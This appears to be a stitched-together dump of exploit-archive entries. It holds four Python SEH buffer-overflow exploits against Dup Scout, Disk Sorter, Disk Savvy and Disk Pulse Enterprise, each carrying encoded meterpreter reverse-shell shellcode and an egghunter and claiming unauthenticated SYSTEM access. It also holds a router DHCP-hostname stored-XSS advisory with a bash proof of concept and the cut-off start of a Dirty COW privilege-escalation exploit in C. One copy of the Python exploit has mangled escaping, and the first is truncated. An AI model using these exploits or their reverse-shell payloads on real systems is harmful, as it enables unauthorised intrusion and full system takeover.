connect=s.connect(('192.168.123.130',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
#pop pop ret 1001A1B8
nseh = "\x90\x90\xEB\x0B"
seh = "\xB8\xA1\x01\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
#!/usr/bin/python
print "Dup Scout Enterprise 9.1.14 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 9.0.28: www.exploit-db.com/exploits/40457/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
#pop pop ret 1004FAF3
nseh = "\x90\x90\xEB\x0B"
seh = "\xF3\xFA\x04\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
#!/usr/bin/python
print "Disk Sorter Enterprise 9.1.12 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 9.0.24: www.exploit-db.com/exploits/40458/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
#pop pop ret 1004F9DD
nseh = "\x90\x90\xEB\x0B"
seh = "\xDD\xF9\x04\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
#!/usr/bin/python
print "Disk Savvy Enterprise 9.1.14 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 9.0.32: www.exploit-db.com/exploits/40459/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))
#bad chars \x00\x0a\x0d\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest
#payload size 308
buf = ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"
#pop pop ret 10081A9C
nseh = "\x90\x90\xEB\x0B"
seh = "\x9C\x1A\x08\x10"
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
evil = "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "\x42" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672
print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
#!/usr/bin/python
print \"Disk Pulse Enterprise 9.1.16 Login Buffer Overflow\"
print \"Author: Tulpa / tulpa[at]tulpa-security[dot]com\"
#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security
#Exploit will land you NT AUTHORITY\\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust \'\\x41\' for bytes
#Tested on Windows 7 x86 Enterprise SP1
#Vendor has been notified on multiple occasions
#Exploit for version 9.0.34: www.exploit-db.com/exploits/40452/
#Shout-out to carbonated and ozzie_offsec
import socket
import sys
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((\'192.168.123.130\',80))
#bad chars \\x00\\x0a\\x0d\\x26
#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b \'\\x00\\x0a\\x0d\\x26\' -f python --smallest
#payload size 308
buf = \"\"
buf += \"\\xdb\\xdc\\xb8\\x95\\x49\\x89\\x1d\\xd9\\x74\\x24\\xf4\\x5f\\x33\"
buf += \"\\xc9\\xb1\\x47\\x31\\x47\\x18\\x83\\xc7\\x04\\x03\\x47\\x81\\xab\"
buf += \"\\x7c\\xe1\\x41\\xa9\\x7f\\x1a\\x91\\xce\\xf6\\xff\\xa0\\xce\\x6d\"
buf += \"\\x8b\\x92\\xfe\\xe6\\xd9\\x1e\\x74\\xaa\\xc9\\x95\\xf8\\x63\\xfd\"
buf += \"\\x1e\\xb6\\x55\\x30\\x9f\\xeb\\xa6\\x53\\x23\\xf6\\xfa\\xb3\\x1a\"
buf += \"\\x39\\x0f\\xb5\\x5b\\x24\\xe2\\xe7\\x34\\x22\\x51\\x18\\x31\\x7e\"
buf += \"\\x6a\\x93\\x09\\x6e\\xea\\x40\\xd9\\x91\\xdb\\xd6\\x52\\xc8\\xfb\"
buf += \"\\xd9\\xb7\\x60\\xb2\\xc1\\xd4\\x4d\\x0c\\x79\\x2e\\x39\\x8f\\xab\"
buf += \"\\x7f\\xc2\\x3c\\x92\\xb0\\x31\\x3c\\xd2\\x76\\xaa\\x4b\\x2a\\x85\"
buf += \"\\x57\\x4c\\xe9\\xf4\\x83\\xd9\\xea\\x5e\\x47\\x79\\xd7\\x5f\\x84\"
buf += \"\\x1c\\x9c\\x53\\x61\\x6a\\xfa\\x77\\x74\\xbf\\x70\\x83\\xfd\\x3e\"
buf += \"\\x57\\x02\\x45\\x65\\x73\\x4f\\x1d\\x04\\x22\\x35\\xf0\\x39\\x34\"
buf += \"\\x96\\xad\\x9f\\x3e\\x3a\\xb9\\xad\\x1c\\x52\\x0e\\x9c\\x9e\\xa2\"
buf += \"\\x18\\x97\\xed\\x90\\x87\\x03\\x7a\\x98\\x40\\x8a\\x7d\\xdf\\x7a\"
buf += \"\\x6a\\x11\\x1e\\x85\\x8b\\x3b\\xe4\\xd1\\xdb\\x53\\xcd\\x59\\xb0\"
buf += \"\\xa3\\xf2\\x8f\\x2d\\xa1\\x64\\xf0\\x1a\\xd2\\xf2\\x98\\x58\\x25\"
buf += \"\\xeb\\x04\\xd4\\xc3\\x5b\\xe5\\xb6\\x5b\\x1b\\x55\\x77\\x0c\\xf3\"
buf += \"\\xbf\\x78\\x73\\xe3\\xbf\\x52\\x1c\\x89\\x2f\\x0b\\x74\\x25\\xc9\"
buf += \"\\x16\\x0e\\xd4\\x16\\x8d\\x6a\\xd6\\x9d\\x22\\x8a\\x98\\x55\\x4e\"
buf += \"\\x98\\x4c\\x96\\x05\\xc2\\xda\\xa9\\xb3\\x69\\xe2\\x3f\\x38\\x38\"
buf += \"\\xb5\\xd7\\x42\\x1d\\xf1\\x77\\xbc\\x48\\x8a\\xbe\\x28\\x33\\xe4\"
buf += \"\\xbe\\xbc\\xb3\\xf4\\xe8\\xd6\\xb3\\x9c\\x4c\\x83\\xe7\\xb9\\x92\"
buf += \"\\x1e\\x94\\x12\\x07\\xa1\\xcd\\xc7\\x80\\xc9\\xf3\\x3e\\xe6\\x55\"
buf += \"\\x0b\\x15\\xf6\\xaa\\xda\\x53\\x8c\\xc2\\xde\"
#pop pop ret 10015BFE
nseh = \"\\x90\\x90\\xEB\\x0B\"
seh = \"\\xFE\\x5B\\x01\\x10\"
egghunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"
egghunter += \"\\xef\\xb8\\x77\\x30\\x30\\x74\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"
evil = \"POST /login HTTP/1.1\\r\\n\"
evil += \"Host: 192.168.123.132\\r\\n\"
evil += \"User-Agent: Mozilla/5.0\\r\\n\"
evil += \"Connection: close\\r\\n\"
evil += \"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n\"
evil += \"Accept-Language: en-us,en;q=0.5\\r\\n\"
evil += \"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"
evil += \"Keep-Alive: 300\\r\\n\"
evil += \"Proxy-Connection: keep-alive\\r\\n\"
evil += \"Content-Type: application/x-www-form-urlencoded\\r\\n\"
evil += \"Content-Length: 17000\\r\\n\\r\\n\"
evil += \"username=admin\"
evil += \"&password=aaaaa\\r\\n\"
evil += \"\\x41\" * 13664 #subtract/add for payload
evil += \"B\" * 100
evil += \"w00tw00t\"
evil += buf
evil += \"\\x90\" * 212
evil += nseh
evil += seh
evil += \"\\x90\" * 10
evil += egghunter
evil += \"\\x90\" * 8672
print \'Sending evil buffer...\'
s.send(evil)
print \'Payload Sent!\'
s.close()
Document Title:
===============
Tenda, Dlink & Tplink TD-W8961ND - DHCP XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1990
Release Date:
=============
2016-11-28
Vulnerability Laboratory ID (VL-ID):
====================================
1990
Common Vulnerability Scoring System:
====================================
3.5
Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered a persistent xss vulnerability in the Tenda, Dlink & Tplink 1.0.1 TD-W8961ND & ADSL2+ Modem Routers web-application.
Vulnerability Disclosure Timeline:
==================================
2016-11-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Persistent cross site scripting vulnerability has been discovered in Tenda 1.0.1 ADSL Modem Routers.
The vulnerability allows remote attackers and local privileged account to inject malicious script codes
on the application-side to manipulate the router dhcp hostnames.
Attackers are able to inject malicious code into the current list of DHCP clients on view, by modifying
the DHCP hostname into valid xss payload. The execution of vulnerability occurs on the application-side
on view events. Due to our investigation, we discovered that all models with the firmware v1.x on the
web gui are affected by the security vulnerability. Remote attackers can for example make special crafted
malicious pages with POST method requests to manipulate the dhcp hostname listing and client view.
The security risk of the issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
Exploitation of the vulnerability requires no privilege web-application user account and only low user interaction.
Successful exploitation of the vulnerability results in phishing attacks, session hijacking, persistent external redirect
to malicious sources and persistent manipulation of affected or connected web module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] DHCP Client List
[+] DHCP settings
Vulnerable Parameter(s):
[+] Hostnames
Proof of Concept (PoC):
=======================
Persistent vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manaul steps to reproduce the vulnerability ... (local)
1. Open the Router UI
2. Login as basic account
3. Open the DHCP List module via settings
4. Inject a payload to the hostnames input field
5. Save the input
6. Now the list becomes visible with all clients and the payload executes within the context
7. Successful reproduce of the vulnerability!
The following code is a bash script working on supported Linux OS to change the name of DHCP hostnames to a xss payload.
Save the file into vulnerablity.sh, then chmod +x vulnerability.sh.
PoC: Exploit
#!/bin/bash
GREEN=$(tput setaf 2 && tput bold)
BLUE=$(tput setaf 6 && tput bold)
echo $BLUE"[+] Persistent XSS DHCP Exploiter via Routers"
echo $GREEN"[+] Vulnerability founded by : Lawrence Amer "
echo -n $BLUE"[~] type XSS Payload here :"
read -e xss
echo $xss > /etc/hostname
echo $GREEN"[+]DHCP HOST NAME IS WRITTEN"
Video: https://www.youtube.com/watch?v=HUM5myJWbvc
Solution - Fix & Patch:
=======================
The xss vulnerability can be patched by a secure parse of the hostnames client parameters.
Restrict the input and disallow the usage of special chars to prevent the injection point.
Parse as well the hostnames output location in the active dhcp clients list.
Security Risk:
==============
The security risk of the persistent xss web vulnerability in the router web-application is estimate as medium. (CVSS 3.5)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Lawrence Amer (https://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
// $ echo pikachu|sudo tee pokeball;ls -l pokeball;gcc -pthread pokemon.c -o d;./d pokeball miltank;cat pokeball
#include <fcntl.h> //// pikachu
#include <pthread.h> //// -rw-r--r-- 1 root root 8 Apr 4 12:34 pokeball
#include <string.h> //// pokeball
#include <stdio.h> //// (___)
#include <stdint.h> //// (o o)_____/
#include <sys/mman.h> //// @@ ` \
#include <sys/types.h> //// \ ____, /miltank
#include <sys/stat.h> //// // //
#include <sys/wait.h> //// ^^ ^^
#include <sys/ptrace.h> //// mmap bc757000
#include <unistd.h> //// madvise 0
////////////////////////////////////////////// ptrace 0
////////////////////////////////////////////// miltank
//////////////////////////////////////////////
int f ;// file descriptor
void *map ;// memory map
pid_t pid ;// process id
pthread_t pth ;// thread
struct stat st ;// file info
//////////////////////////////////////////////
void *madviseThread(void *arg) {// madvise thread
int i,c=0 ;// counters
for(i=0;i<200000000;i++)//////////////////// loop to 2*10**8
c+=madvise(map,100,MADV_DONTNEED) ;// race condition
printf("madvise %d\n\n",c) ;// sum of errors
}// /madvise thread
//////////////////////////////////////////////
int main(int argc,char *argv[]) {// entrypoint
if(argc<3)return 1 ;// ./d file contents
printf("%s \n\
(___) \n\
(o o)_____/ \n\
@@ ` \\ \n\
\\ ____, /%s \n\
// // \n\
^^ ^^ \n\
